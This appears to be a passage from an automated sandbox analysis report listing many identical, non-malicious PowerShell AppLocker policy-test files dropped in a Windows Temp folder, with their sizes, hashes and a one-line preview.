                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwokrnzt.ngf.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3vo5cju.11y.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caflgyvz.xzg.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clfti0ms.s4k.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_conqovt3.dcu.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuojhk2p.yqg.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxu0qxel.icq.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1f2txki.ykj.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwgzbd2r.oaf.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eva5vk02.xp3.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f225w20n.ozn.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpjnrmzu.b3r.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnpfnawa.dsn.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gozbbzss.gmr.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gu215gw4.ebq.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2z0drfg.bgd.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpqb2po2.zzi.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv1sawxm.tpk.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqbia3we.nt4.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iytaz2es.say.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyxz1yto.qux.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkopzl0v.cux.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcyatgze.ney.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnebtfjv.uha.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltmax0d3.qny.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3yogpcz.d4v.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncnedmoa.qka.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncoeg2zp.1vu.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oe4vxklv.fe1.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogq5iwil.nuy.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oout01bl.beh.ps1

                                                                                Download File
